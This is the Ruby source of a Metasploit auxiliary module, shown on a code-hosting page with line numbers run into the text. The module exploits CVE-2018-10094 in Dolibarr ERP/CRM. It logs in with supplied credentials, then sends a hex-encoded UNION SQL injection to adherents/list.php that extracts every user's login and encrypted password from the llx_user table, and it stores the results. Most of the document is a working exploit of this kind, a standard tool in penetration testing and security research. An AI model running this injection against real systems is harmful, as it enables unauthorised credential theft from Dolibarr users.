Path: blob/master/modules/auxiliary/gather/dolibarr_creds_sqli.rb
19721 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Dolibarr Gather Credentials via SQL Injection',13'Description' => %q{14This module enables an authenticated user to collect the usernames and15encrypted passwords of other users in the Dolibarr ERP/CRM via SQL16injection.17},18'Author' => [19'Issam Rabhi', # PoC20'Kevin Locati', # PoC21'Shelby Pace', # Metasploit Module22],23'License' => MSF_LICENSE,24'References' => [25[ 'CVE', '2018-10094' ],26[ 'EDB', '44805']27],28'DisclosureDate' => '2018-05-30',29'Notes' => {30'Reliability' => UNKNOWN_RELIABILITY,31'Stability' => UNKNOWN_STABILITY,32'SideEffects' => UNKNOWN_SIDE_EFFECTS33}34)35)3637register_options(38[39OptString.new('TARGETURI', [ true, 'The base path to Dolibarr', '/' ]),40OptString.new('USERNAME', [ true, 'The username for authenticating to Dolibarr', 'admin' ]),41OptString.new('PASSWORD', [ true, 'The password for authenticating to Dolibarr', 'admin' ])42]43)44end4546def check_availability47login_page = target_uri.path.end_with?('index.php') ? normalize_uri(target_uri.path) : normalize_uri(target_uri.path, '/index.php')48res = send_request_cgi(49'method' => 'GET',50'uri' => normalize_uri(login_page)51)5253return false unless res && res.body.include?('Dolibarr')5455return res56end5758def login(response)59return false unless response6061login_uri = target_uri.path.end_with?('index.php') ? normalize_uri(target_uri.path) : normalize_uri(target_uri.path, '/index.php')62cookies = response.get_cookies63print_status("Logging in...")6465login_res = send_request_cgi(66'method' => 'POST',67'uri' => login_uri,68'cookie' => cookies,69'vars_post' => {70'username' => datastore['USERNAME'],71'password' => datastore['PASSWORD'],72'loginfunction' => 'loginfunction'73}74)7576unless login_res && login_res.body.include?('id="mainmenua_members"')77fail_with(Failure::NoAccess, "Couldn't log into Dolibarr")78end7980print_good("Successfully logged into Dolibarr")81return cookies82end8384def get_info(cookies)85inject_uri = target_uri.path.end_with?('index.php') ? target_uri.path.gsub('index.php', '') : target_uri.path86inject_uri <<= "/adherents/list.php?leftmenu=members&statut="87cmd = "1) union select 0,1,login,pass_crypted,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from llx_user #"88cmd = Rex::Text.uri_encode(cmd, 'hex-all')89inject_uri <<= cmd9091inject_res = send_request_cgi(92'method' => 'GET',93'uri' => normalize_uri(inject_uri),94'cookie' => cookies95)9697unless inject_res && inject_res.body.include?('id="searchFormList"')98fail_with(Failure::NotFound, "Failed to access page. The user may not have permissions.")99end100101print_good("Accessed credentials")102format_results(inject_res.body)103end104105def format_results(output)106credentials = output.scan(/valignmiddle">0<\/div><\/a><\/td>.<td>([a-zA-Z0-9]*)<\/td>.<td>(\S*)<\/td>/m)107108fail_with(Failure::NotFound, "No credentials found") if credentials.empty?109110credentials.each do |i, j|111print_good("#{j} #{i}")112store_valid_credential(user: j, private: i)113end114end115116def run117available_res = check_availability118fail_with(Failure::NotFound, "Could not access the Dolibarr webpage") unless available_res119120cookies = login(available_res)121fail_with(Failure::NoAccess, "Could not log in. Verify credentials") unless cookies122123get_info(cookies)124end125end126127128